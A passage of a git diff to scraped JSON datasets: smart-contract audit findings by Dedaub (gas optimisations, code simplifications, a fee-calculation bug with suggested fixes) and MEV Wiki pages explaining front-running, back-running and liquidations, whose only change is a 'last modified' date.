01", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "reserved tokens Open In most strategies the collateral token is part of those in isReservedToken. 
Not in AlphaLendStrategy.", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "modifiers ACKNOWLEDGED Methods syncDeps of MarginAccount and InsuranceFund could be declared external instead of public.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "COMP rewards can be triggered by anyone Dismissed, after review Although we cannot see an issue with it, multiple public functions allow anyone to trigger a claim of COMP rewards, e.g., in CompoundLeverageStrategy methods totalValueCurrent/isLossMaking, and similarly in CompoundXYStrategy. It is worth revisiting whether the timing of rewards can confer a benefit to a user.", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "code/contracts ACKNOWLEDGED tests/Executor.sol is not used. A12 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.9 which, at the time of writing, has some known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaffected. CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts wields considerable power over the protocol, including changing the contracts holding the users' funds, adding AMMs and tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol can: - Blacklist any user. - Set important parameters in the vAMM which change the price of any assets: price_scale, price_oracle, last_prices. This allows the owner to potentially liquidate otherwise healthy positions or enter into bad debt positions. The computation of the Margin Fraction takes into account the weighted collateral, whose weights are going to be decided by governance. Currently the protocol uses NFTs for governance but in the future the decisions will be made through a DAO. Currently, there is no relevant implementation, i.e., the Hubble protocol does not yet offer a governance token. Still, even if the final solution is decentralized, governance should be really careful and methodical when deciding the values of the weights. We believe that another, safer approach would be to alter these weights in a specific way defined by predetermined formulas and allow only small adjustments by the DAO.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "conventions Resolved Similar functionality often follows different conventions. For instance, between CompoundXYStrategyETH and CompoundLeverageStrategyETH, we notice a difference in the _mint function (in one case it returns a value, in the other not), and the presence of an _afterRedeem vs. full overriding of _redeemUnderlying.
", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { - "title": "suggestions ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", - "body": " INFO In the RelayEncoder.sol contract the function encode_withdraw_unbonded() uses several arithmetic operations with numbers that can be expressed as powers of 2. Thus, the multiplications and the divisions can be replaced with bitwise operations for more efficiency and maintainability. Furthermore, in Encoding.sol::scaleCompactUint:45 the 0xFF can be removed since the uint8() casting will give the same result even without the AND operation.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "looser checks are performed on construction than on migrateFusePool() Resolved When the RariFuseStrategy is constructed, a CToken (assumed to belong to an instantiation of a Rari Fuse pool) is passed as an argument. However, when the strategy migrates to another Fuse pool, Fuse's API is used to ensure the new CToken will be part of a Rari Fuse pool. The same checks should also take place during the contract's construction. A7 Compiler bugs Info The contracts were compiled with the Solidity compiler v0.8.3 which, at the time of writing, has a known minor issue. We have reviewed the issue and do not believe it to affect the contracts. More specifically, the known compiler bug associated with Solidity compiler v0.8.3: Memory layout corruption can happen when using abi.decode for the deserialization of two-dimensional arrays.", "labels": [ "Dedaub", - "Lido on Kusama,Polkadot Delta", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", - "body": "for minor changes ACKNOWLEDGED The auditors appreciated the inclusion of tests for all major changes. It would be beneficial to include tests also for smaller changes that seem to be missing (for instance we could not find a test for the case totalXcKSMPoolShares == 0 and totalVirtualXcKSMAmount != 0). Although this check is minor, the fact that it was missing in the previous version makes it worthy of a test. A3 Compiler known issues INFO The code is compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, i.e., a specific version, to be confident about the baseline guarantees offered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe affect the correctness of the contracts", + "title": "gas behavior in BondExtraData ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Delta Audit (NFT additions).pdf", + "body": " RESOLVED (commit a60f451f) The BondExtraData struct is designed to fit in one storage word: struct BondExtraData { uint80 initialHalfDna; uint80 finalHalfDna; uint32 troveSize; // Debt in LUSD uint32 lqtyAmount; // Holding LQTY, staking or deposited into Pickle uint32 curveGaugeSlopes; // For 3CRV and Frax pools combined } (We note, in passing, that the uint32 amounts are rounded down, so different underlying amounts can map to the same recorded amount. This seems like an extremely minor inaccuracy but it also pertains to issue L1, of NFT manipulation.)
The result of fitting the struct in a single word is that the following code is highly suboptimal, gas-wise, requiring 4 separate SSTOREs, but also SLOADs of values before the SSTORE (so that unaffected bits get preserved): function setFinalExtraData(address _bonder, uint256 _tokenID, uint256 _permanentSeed) external returns (uint80) { idToBondExtraData[_tokenID].finalHalfDna = newDna; idToBondExtraData[_tokenID].troveSize = _uint256ToUint32(troveManager.getTroveDebt(_bonder)); idToBondExtraData[_tokenID].lqtyAmount = _uint256ToUint32(lqtyToken.balanceOf(_bonder) + lqtyStaking.stakes(_bonder) + pickleLQTYAmount); idToBondExtraData[_tokenID].curveGaugeSlopes = _uint256ToUint32((curveLUSD3CRVGaugeSlope + curveLUSDFRAXGaugeSlope) * CURVE_GAUGE_SLOPES_PRECISION); We recommend using a memory record of the struct, reading its original value from storage, updating the 4 fields in-memory, and storing back to idToBondExtraData[_tokenID]. The Solidity compiler could conceptually optimize the above pattern, but current versions do not even attempt such an optimization in the presence of internal calls, let alone external calls. (We also ascertained that the resulting bytecode is suboptimal under the current build settings of the repo.)", "labels": [ "Dedaub", - "Lido on Kusama,Polkadot Delta", + "Chicken Bonds Delta", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - May '23.pdf", - "body": "Stake event does not capture the msg.sender WONT FIX The SolidStaking Stake event captures the recipient account but not the msg.sender, thus this piece of information is not recorded if the recipient is not also the msg.sender. A2 LiquidityDeployer::getTokenDepositors can be optimized to save gas WONT FIX The function LiquidityDeployer::getTokenDepositors copies the depositors array from storage to memory by performing a loop over each element of the array instead of just returning the array. LiquidityDeployer::getTokenDepositors function getTokenDepositors() external view returns (address[] memory tokenDepositors) { tokenDepositors = new address[](depositors.tokenDepositors.length); for (uint i; i < depositors.tokenDepositors.length; i++) { tokenDepositors[i] = depositors.tokenDepositors[i]; } } By changing the code to: function getTokenDepositors() external view returns (address[] memory tokenDepositors) { return depositors.tokenDepositors; } the cost of calling getTokenDepositors is reduced by 33% and the deployment cost of the LiquidityDeployer is reduced by ~1.5%.", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Delta Audit (NFT additions).pdf", + "body": "extraneous check RESOLVED (commit f5fb7f16) Under the, relatively reasonable, assumption that MIN_BOND_AMOUNT is never zero, the first of the following checks would be extraneous: function createBond(uint256 _lusdAmount) public returns (uint256) { _requireNonZeroAmount(_lusdAmount); _requireMinBond(_lusdAmount); A3 Compiler bugs INFO (RESOLVED) The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specific version, so as to be confident about the baseline guarantees offered by the compiler.
Version 0.8.10, in particular, has some known bugs, which we do not believe to affect the correctness of the contracts.", "labels": [ "Dedaub", - "Solid World", + "Chicken Bonds Delta", "Severity: Informational" ] }, @@ -1868,85 +2828,5 @@ "Chainlink VRF v.2", "Severity: Informational" ] - }, - { - "title": "can be simplified from Uint32 to Bool ", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": " RESOLVED In aZil, the field tmp_buffer_exists_at_ssn is declared as Uint32: field tmp_buffer_exists_at_ssn: Uint32 = uint32_zero However, all writes to this field are either 0 or 1, and all reads from it are followed up by an equality check with 0 and a match statement - the field is a boolean à la C. It is recommended that the field be declared Bool, in order to improve code readability and simplify the snippets that read from it.", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": "assignment sequence can be simplified RESOLVED In the aZil.CalculateTotalWithdrawalBlock procedure, the following can be simplified: procedure CalculateTotalWithdrawalBlock(deleg_withdrawal: Pair ByStr20 Withdrawal) match deleg_withdrawal with | Pair delegator withdrawal => match withdrawal with | Withdrawal withdraw_token_amt withdraw_stake_amt => match withdrawal_unbonded_o with | Some (Withdrawal token stake) => updated_token = builtin add token withdraw_token_amt; updated_stake = builtin add stake withdraw_stake_amt; unbonded_withdrawal = Withdrawal updated_token updated_stake; withdrawal_unbonded[delegator] := unbonded_withdrawal | None => (* Dedaub: This branch can be simplified to withdrawal_unbonded[delegator] := withdrawal *) unbonded_withdrawal = Withdrawal withdraw_token_amt withdraw_stake_amt; withdrawal_unbonded[delegator] := unbonded_withdrawal end end end end The inner match's None case can become: | None => withdrawal_unbonded[delegator] := withdrawal end", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": "of multisig_wallet.RevokeSignature can be simplified DISMISSED In multisig_wallet, RevokeSignature can be simplified. The transition checks whether there are zero signatures through c_is_zero = builtin eq c zero; but for this line of code to execute, exists signatures[transactionId][_sender]; must have already been true. Therefore it is guaranteed that there is at least one signature, so c cannot be 0 and c_is_zero cannot be True. Thus the following transition can be simplified: (* Revoke signature of existing transaction, if it has not yet been executed. 
*) transition RevokeSignature (transactionId : Uint32) sig <- exists signatures[transactionId][_sender]; match sig with | False => err = NotAlreadySigned; MakeError err | True => count <- signature_counts[transactionId]; match count with | None => err = IncorrectSignatureCount; MakeError err | Some c => c_is_zero = builtin eq c zero; match c_is_zero with | True => err = IncorrectSignatureCount; MakeError err | False => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e end end end end By replacing the Some c branch with the following: Some c => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": "of azil.DrainBuffer logic can be simplified RESOLVED Transition DrainBuffer of aZil also admits some simplification: a bind action can be factored out, since it occurs in both cases of a match, and another binding is redundant, both shown in comments below. transition DrainBuffer(buffer_addr: ByStr20) RequireAdmin; buffers_addrs <- buffers_addresses; is_buffer = is_buffer_addr buffers_addrs buffer_addr; match is_buffer with | True => FetchRemoteBufferExistsAtSSN buffer_addr; (* local_lastrewardcycle updated in FetchRemoteBufferExistsAtSSN *) lrc <- local_lastrewardcycle; RequireNotDrainedBuffer buffer_addr lrc; var_buffer_exists <- tmp_buffer_exists_at_ssn; is_exists = builtin eq var_buffer_exists uint32_one; match is_exists with | True => holder_addr <- holder_address; ClaimRewards buffer_addr; ClaimRewards holder_addr; RequestDelegatorSwap buffer_addr holder_addr; ConfirmDelegatorSwap buffer_addr holder_addr | False => holder_addr <- holder_address; (* Dedaub: This is also done in the True branch of the match *) ClaimRewards holder_addr end | False => e = BufferAddrUnknown; ThrowError e end; lrc <- local_lastrewardcycle; (* Dedaub: extraneous, it was already done above in the True case, and the False case is irrelevant *) buffer_drained_cycle[buffer_addr] := lrc; tmp_buffer_exists_at_ssn := uint32_zero end A5 Buffer/Holder have permissions for transitions they will never execute DISMISSED As can be seen in the earlier transition graph, Buffer is allowed to initiate aZil.CompleteWithdrawalSuccessCallBack but never will. Holder is allowed to initiate aZil.DelegateStakeSuccessCallBack but never will.", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", - "body": "tokens conversion Status Resolved In the following code snippet, taken from arShield::liqAmts, the amounts ethOwed and tokensOwed are supposed to represent equal value. ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; tokensOwed += tokenFees; require(tokensOwed > 0, \"No fees are owed.\"); uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; However, code line tokensOwed += tokenFees; is misplaced, resulting in an underpriced ethFees computation. 
We suggest that it be altered as follows for accuracy: ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; require(tokensOwed + tokenFees > 0, \"No fees are owed.\"); uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; tokensOwed += tokenFees; H2 Duplicate subtraction of fees amount Resolved In arShield::payAmts the new ethValue is calculated as follows: // Ether value of all of the contract minus what we're liquidating. ethValue = (pToken.balanceOf( address(this) ) // Dedaub: _tokenFees amount is subtracted twice - _tokenFees - totalFeeAmts()) * _ethOwed / _tokensOwed totalFeeAmts() also considers all liquidation fees, resulting in _tokenFees being subtracted twice. This can cause significant harm to the protocol, as the total value of coverage purchased is underestimated. Medium Severity ", "labels": [ "Dedaub", "Armor arShield", "Severity: High" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", "body": "variable name Status Resolved We suggest that variable totalCost // Current cost per second for all Ether on contract. uint256 public totalCost; be renamed to totalCostPerSec for clarity.", "labels": [ "Dedaub", "Armor arShield", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", "body": "version of SafeMath library Resolved The included SafeMath library code targets an old compiler version (< 0.8.0), while the pragma is set to solidity 0.8.4. However, compiler versions of 0.8.* revert on overflow or underflow, so this library has no effect. We suggest that ArmorCore.sol not use this library and substitute SafeMath operations with normal ones, and that the SafeMath.sol contract be completely removed.", "labels": [ "Dedaub", "Armor arShield", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", "body": "comment Resolved In arShield.sol, function confirmHack has a misleading @dev comment: /** * Dedaub: used by governor, not controller * @dev Used by controller to confirm that a hack happened, which then locks the contract in anticipation of claims. **/ function confirmHack( uint256 _payoutBlock, uint256 _payoutAmt ) external isLocked onlyGov A4 Extra protection of refunds in arShield Resolved Function CoverageBase::disburseClaim is called by governance and transfers an ETH amount to a selected arShield, which is supposed to be used for claim refunds. /** * @dev Governance may disburse funds from a claim to the chosen shields. * @param _shield Address of the shield to disburse funds to. * @param _amount Amount of funds to disburse to the shield. **/ function disburseClaim( address payable _shield, uint256 _amount ) external onlyGov { require(shieldStats[_shield].lastUpdate > 0, \"Shield is not authorized to use this contract.\"); _shield.transfer(_amount); } We suggest that an extra requirement be added, checking that _shield is locked. In the opposite case, the ETH amount transferred to the arShield contract as refunds can be immediately transferred to the beneficiary. 
arShield's contract locking/unlocking and disburseClaim() are all governance-only actions; however, this suggestion ensures security in case of incorrect ordering of the governance transactions.", "labels": [ "Dedaub", "Armor arShield", "Severity: Informational" ] } ] \ No newline at end of file diff --git a/results/gitbook_docs.json b/results/gitbook_docs.json index f7c9be8..dd34376 100644 --- a/results/gitbook_docs.json +++ b/results/gitbook_docs.json @@ -442,7 +442,7 @@ { "title": "Introduction", "html_url": "https://www.mev.wiki/", - "body": "Introduction Welcome to the MEV Wiki. Introduction This is a public resource for learning about MEV (Maximal Extractable Value). We cover a range of topics including the key concepts, research on the topic, and different approaches to tackling this issue by various projects out there. Found any errors or want to share your opinions? See how you can contribute here . What is MEV? Maximal (formerly \"miner\" in the context of Proof of Work) extractable value (MEV) refers to the maximum value that can be extracted from block production in excess of the standard block reward and gas fees by censoring and/or changing the order of transactions in a block. When someone sends a transaction on the blockchain, there is a delay between the time when the transaction is broadcasted to the network and when it is actually mined into a block. During this period, transactions sit in a pending transaction pool called the mempool where contents are visible to everyone. Arbitrageurs and miners can monitor the mempool and find opportunities to maximize their own profits, e.g. by frontrunning transactions. If a front-runner is a miner, they can also reorder or even censor transactions. MEV income can also be shared with non-miners & traders who participate in some profit sharing schemes within the category of FaaS/MEVA . Why does this matter? MEV can harm users MEV is an invisible tax that miners can collect from users. MEV can destabilize Ethereum If block rewards are small enough compared to MEV, it can be rational for miners to destabilize consensus by reordering or censoring transactions. Just how bad is the problem? You can use the Flashbots Dashboard to track Extracted MEV to better assess this worsening trend in real time. Snapshot of Extracted MEV on 28 Sep 2021 from Flashbots It is estimated that more than $727M of MEV has been extracted since 1st January 2020. Snapshot of Extracted MEV Split on 28 Sep 2021 from Flashbots The majority of extracted MEV tends to be from Arbitrage opportunities on various AMMs , with a large percentage of income going to searchers, bots & participants in profit sharing MEV infrastructures (eg. Flashbot's MEV-GETH) Another useful tracker for gas consumption of back-running bots: Dune Analytics provides very detailed statistics on this worsening MEV situation. Link: According to https://research.paradigm.xyz/MEV Next Resource List Last modified 1yr ago", + "body": "Introduction Welcome to the MEV Wiki. Introduction This is a public resource for learning about MEV (Maximal Extractable Value). We cover a range of topics including the key concepts, research on the topic, and different approaches to tackling this issue by various projects out there. Found any errors or want to share your opinions? See how you can contribute here . What is MEV? 
Maximal (formerly \"miner\" in the context of Proof of Work) extractable value (MEV) refers to the maximum value that can be extracted from block production in excess of the standard block reward and gas fees by censoring and/or changing the order of transactions in a block. When someone sends a transaction on the blockchain, there is a delay between the time when the transaction is broadcasted to the network and when it is actually mined into a block. During this period, transactions sit in a pending transaction pool called the mempool where contents are visible to everyone. Arbitrageurs and miners can monitor the mempool and find opportunities to maximize their own profits, e.g. by frontrunning transactions. If a front-runner is a miner, they can also reorder or even censor transactions. MEV income can also be shared with non-miners & traders who participate in some profit sharing schemes within the category of FaaS/MEVA . Why does this matter? MEV can harm users MEV is an invisible tax that miners can collect from users. MEV can destabilize Ethereum If block rewards are small enough compared to MEV, it can be rational for miners to destabilize consensus by reordering or censoring transactions. Just how bad is the problem? You can use the Flashbots Dashboard to track Extracted MEV to better assess this worsening trend in real time. Snapshot of Extracted MEV on 28 Sep 2021 from Flashbots It is estimated that more than $727M of MEV has been extracted since 1st January 2020. Snapshot of Extracted MEV Split on 28 Sep 2021 from Flashbots The majority of extracted MEV tends to be from Arbitrage opportunities on various AMMs , with a large percentage of income going to searchers, bots & participants in profit sharing MEV infrastructures (eg. Flashbot's MEV-GETH) Another useful tracker for gas consumption of back-running bots: Dune Analytics provides very detailed statistics on this worsening MEV situation. Link: According to https://research.paradigm.xyz/MEV Next Resource List Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Attack Examples", "html_url": "https://www.mev.wiki/attack-examples", - "body": "Attack Examples Some examples of attacks. Front-running Sandwich attack Back-running Liquidations Time bandit attack Uncle bandit attack Previous Transaction Ordering Next Front-running Last modified 1yr ago", + "body": "Attack Examples Some examples of attacks. Front-running Sandwich attack Back-running Liquidations Time bandit attack Uncle bandit attack Previous Transaction Ordering Next Front-running Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Attempts to trick the bots", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots", - "body": "Attempts to trick the bots What are the ways some have come up with to trick bots? Salmonella Kattana Other attempts Previous Uncle bandit attack Next Salmonella Last modified 1yr ago", + "body": "Attempts to trick the bots What are the ways some have come up with to trick bots? Salmonella Kattana Other attempts Previous Uncle bandit attack Next Salmonella Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Contributions", "html_url": "https://www.mev.wiki/contributions", - "body": "Contributions BUIDL with MEV Wiki If you would like to contribute to this Wiki on MEV knowledge, please click the \"Edit on Github\" button on any page. Then create a Github pull request to suggest your changes. This wiki is maintained & sponsored by Automata Network . 
If you would like to become a contributor, please join Automata Discord Server . Previous Miscellaneous Last modified 1yr ago", + "body": "Contributions BUIDL with MEV Wiki If you would like to contribute to this Wiki on MEV knowledge, please click the \"Edit on Github\" button on any page. Then create a Github pull request to suggest your changes. This wiki is maintained & sponsored by Automata Network . If you would like to become a contributor, please join Automata Discord Server . Previous Miscellaneous Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Miscellaneous", "html_url": "https://www.mev.wiki/miscellaneous", - "body": "Miscellaneous What Happens when Ethereum moves to Proof-of-Stake? The move from PoW to PoS consensus means the Ethereum network becomes secured by a set of validators, who stake their ETH and vote on consensus, as opposed to miners who run mining equipment to solve for the proof of work. This change of consensus is likely to happen some time in 2021. Some have suggested that this means Miner Extractable Value will become Validator Extractable Value. This is an ongoing discussion and you can follow this here: Link: https://hackmd.io/@flashbots/ryuH4gn7d From Paradigm's piece \"On Staking Pools and Staking Derivatives\" - Staking pools and their staking derivatives are subject to similar market realities as MEV extraction, in the sense that their existence is inevitable. Institutional staking pools (e.g. exchanges) may have social and reputational constraints that prevent them from extracting certain forms of MEV. This allows smaller staking firms and decentralized pools without these constraints to provide higher returns for their stakers. This could turn the decentralization premium for using a decentralized staking pool into a decentralization discount. Link: https://research.paradigm.xyz/staking Other Academic Papers Tesseract Tesseract proposes a front-running resistant exchange relying on Intel SGX as a trusted execution environment. Link: https://eprint.iacr.org/2017/1153.pdf Calypso Enables a blockchain to hold and manage secrets on-chain with the convenient property that it is able to protect against front-running. Link: https://eprint.iacr.org/2018/209.pdf Previous B.Protocol Next Contributions Last modified 1yr ago", + "body": "Miscellaneous What Happens when Ethereum moves to Proof-of-Stake? The move from PoW to PoS consensus means the Ethereum network becomes secured by a set of validators, who stake their ETH and vote on consensus, as opposed to miners who run mining equipment to solve for the proof of work. This change of consensus is likely to happen some time in 2021. Some have suggested that this means Miner Extractable Value will become Validator Extractable Value. This is an ongoing discussion and you can follow this here: Link: https://hackmd.io/@flashbots/ryuH4gn7d From Paradigm's piece \"On Staking Pools and Staking Derivatives\" - Staking pools and their staking derivatives are subject to similar market realities as MEV extraction, in the sense that their existence is inevitable. Institutional staking pools (e.g. exchanges) may have social and reputational constraints that prevent them from extracting certain forms of MEV. This allows smaller staking firms and decentralized pools without these constraints to provide higher returns for their stakers. This could turn the decentralization premium for using a decentralized staking pool into a decentralization discount. 
Link: https://research.paradigm.xyz/staking Other Academic Papers Tesseract Tesseract proposes a front-running resistant exchange relying on Intel SGX as a trusted execution environment. Link: https://eprint.iacr.org/2017/1153.pdf Calypso Enables a blockchain to hold and manage secrets on-chain with the convenient property that it is able to protect against front-running. Link: https://eprint.iacr.org/2018/209.pdf Previous B.Protocol Next Contributions Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Resource List", "html_url": "https://www.mev.wiki/resource-list", - "body": "Resource List Links Name Type What Is Miner-Extractable Value (MEV)? Article Miners, Front-Running-as-a-Service Is Theft Article MEV and Me Article Ethereum is a Dark Forest Article Escaping the Dark Forest Article Ethereum Blockspace: Who Gets What and Why Article The fastest draw on the Blockchain: Ethereum Backrunning Article Security of Interoperability Presentation Gas Wars: Understanding Ethereum's Mempool & Miner Extractable Value Podcast Smart Contract Security - Incentives Beyond the Launch by Phil Daian (Devcon4) Video Enter the Dark Forest: the terrifying world of MEV and Flash bots Video Frontrunning in Decentralized Exchanges, Miner Extractable Value, and Consensus Instability Video How To Get Front-Run on Ethereum mainnet Video Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges Research Paper Quantifying Blockchain Extractable Value: How dark is the forest? Research Paper High-Frequency Trading on Decentralized On-Chain Exchanges Research Paper Frontrunner Jones and the Raiders of the Dark Forest: An Empirical Study of Frontrunning on the Ethereum Blockchain Research Paper Previous Introduction Next Terms and Concepts Last modified 1yr ago", + "body": "Resource List Links Name Type What Is Miner-Extractable Value (MEV)? Article Miners, Front-Running-as-a-Service Is Theft Article MEV and Me Article Ethereum is a Dark Forest Article Escaping the Dark Forest Article Ethereum Blockspace: Who Gets What and Why Article The fastest draw on the Blockchain: Ethereum Backrunning Article Security of Interoperability Presentation Gas Wars: Understanding Ethereum's Mempool & Miner Extractable Value Podcast Smart Contract Security - Incentives Beyond the Launch by Phil Daian (Devcon4) Video Enter the Dark Forest: the terrifying world of MEV and Flash bots Video Frontrunning in Decentralized Exchanges, Miner Extractable Value, and Consensus Instability Video How To Get Front-Run on Ethereum mainnet Video Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges Research Paper Quantifying Blockchain Extractable Value: How dark is the forest? Research Paper High-Frequency Trading on Decentralized On-Chain Exchanges Research Paper Frontrunner Jones and the Raiders of the Dark Forest: An Empirical Study of Frontrunning on the Ethereum Blockchain Research Paper Previous Introduction Next Terms and Concepts Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Solutions", "html_url": "https://www.mev.wiki/solutions", - "body": "Solutions Different approaches to tackling the MEV problem There are largely 2 schools of thought when it comes to approaching the MEV problem: 1. Offense - MEV is here to stay so let's find a way to extract and democratize it. 2. Defense - MEV is bad so let's try to prevent it. 
Projects like Automata Network are in the Defense camp where the solution Conveyor ingests transactions and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. To further explain, we have put different approaches into 3 categories: Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEV Minimization Other solutions Previous Other attempts Next Front-running as a Service (FaaS) or MEV Auctions (MEVA) Last modified 1yr ago", + "body": "Solutions Different approaches to tackling the MEV problem There are largely 2 schools of thought when it comes to approaching the MEV problem: 1. Offense - MEV is here to stay so let's find a way to extract and democratize it. 2. Defense - MEV is bad so let's try to prevent it. Projects like Automata Network are in the Defense camp where the solution Conveyor ingests transactions and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. To further explain, we have put different approaches into 3 categories: Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEV Minimization Other solutions Previous Other attempts Next Front-running as a Service (FaaS) or MEV Auctions (MEVA) Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Terms and Concepts", "html_url": "https://www.mev.wiki/terms-and-concepts", - "body": "Terms and Concepts Exploring the main concepts involving MEV. DeFi Automated Market Maker Arbitrage Lending Platforms Slippage Liquidations Priority Gas Auctions Transaction Ordering Previous Resource List Next DeFi Last modified 1yr ago", + "body": "Terms and Concepts Exploring the main concepts involving MEV. DeFi Automated Market Maker Arbitrage Lending Platforms Slippage Liquidations Priority Gas Auctions Transaction Ordering Previous Resource List Next DeFi Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Back-running", "html_url": "https://www.mev.wiki/attack-examples/back-running", - "body": "Back-running What is back-running? Back-running occurs when a transaction sender wishes to have their transaction ordered immediately after some unconfirmed \"target transaction\". Example: A back-running bot that back-runs new token listings. Bot monitors the Ethereum mempool for new pairs being created on Uniswap. If it finds a new pair, the bot places a buy transaction immediately behind the initial liquidity. The bot swoops in and buys as many tokens as possible (but not all of them as there needs to be an opportunity for others to buy tokens as well). The bot then waits for the price to go up as other traders buy the token from Uniswap and proceeds to sell back the tokens at a higher price. The key in this strategy is to be the first to buy tokens, but only after the token has been launched . In order to maximise their chances of being mined immediately after their target, a typical backrunner will send many identical transactions, with gas price identical to that of the target transaction, sometimes from different accounts. 1. https://amanusk.medium.com/the-fastest-draw-on-the-blockchain-bzrx-example-6bd19fabdbe1 Previous Sandwich attack Next Liquidations Last modified 1yr ago", + "body": "Back-running What is back-running? Back-running occurs when a transaction sender wishes to have their transaction ordered immediately after some unconfirmed \"target transaction\". 
Example: A back-running bot that back-runs new token listings. Bot monitors the Ethereum mempool for new pairs being created on Uniswap. If it finds a new pair, the bot places a buy transaction immediately behind the initial liquidity. The bot swoops in and buys as many tokens as possible (but not all of them as there needs to be an opportunity for others to buy tokens as well). The bot then waits for the price to go up as other traders buy the token from Uniswap and proceeds to sell back the tokens at a higher price. The key in this strategy is to be the first to buy tokens, but only after the token has been launched . In order to maximise their chances of being mined immediately after their target, a typical backrunner will send many identical transactions, with gas price identical to that of the target transaction, sometimes from different accounts. 1. https://amanusk.medium.com/the-fastest-draw-on-the-blockchain-bzrx-example-6bd19fabdbe1 Previous Sandwich attack Next Liquidations Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Liquidations", "html_url": "https://www.mev.wiki/attack-examples/liquidations", - "body": "Liquidations How are liquidations exploited? Back-running strategies also apply to liquidations whereby a transaction sender wishes to be the first to liquidate a loan right after a price oracle update (which will allow liquidation to be triggered). Fixed spread liquidation used by Compound, Aave, and dYdX allows a liquidator to purchase collateral at a fixed discount when repaying debt. Strategy 1 Strategy 2 A detects a liquidation opportunity at block B (i.e., after the execution of B). A then issues a liquidation transaction T, which is expected to be mined in the next block B+1. A attempts to destructively front-run other competing liquidators by setting high transaction fees for his liquidation transaction T. A observes a transaction T, which will create a liquidation opportunity (e.g., an oracle price update transaction which will render a collateralized debt liquidatable). A then back-runs T with a liquidation transaction TA to avoid the transaction fee bidding competition. The auction liquidation allows a liquidator to start an auction that lasts for a pre-configured period (e.g., 6 hours). Competing liquidators 